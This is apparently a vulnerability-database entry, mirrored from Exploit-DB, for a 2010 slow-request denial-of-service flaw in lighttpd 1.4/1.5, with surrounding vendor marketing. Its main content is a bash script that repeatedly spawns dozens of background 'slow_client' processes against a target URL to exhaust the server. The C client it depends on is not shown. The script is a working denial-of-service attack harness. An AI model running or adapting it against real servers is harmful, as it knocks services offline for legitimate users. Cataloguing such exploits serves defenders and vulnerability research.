Lucene search

K

lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Service

πŸ—“οΈΒ 02 Feb 2010Β 00:00:00Reported byΒ Li MingTypeΒ 
exploitdb
Β exploitdb
πŸ”—Β www.exploit-db.comπŸ‘Β 38Β Views

The 'lighttpd' webserver is vulnerable to a denial-of-service attack due to slow request handling

Show more
Related
Code
source: https://www.securityfocus.com/bid/38036/info

The 'lighttpd' webserver is prone to a denial-of-service vulnerability.

Remote attackers can exploit this issue to cause the application to hang, denying service to legitimate users. 

##slow_test.sh
for ((j=0;j<1000;j++)) do
  for ((i=0; i<50; i++)) do
  ## slow_client is a C program which sends a HTTP request very slowly
    ./slow_client http://www.example.com/>/dev/null 2>/dev/null &
  done&
  sleep 3
done

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
02 Feb 2010 00:00Current
7.4High risk
Vulners AI Score7.4
38
.json
Report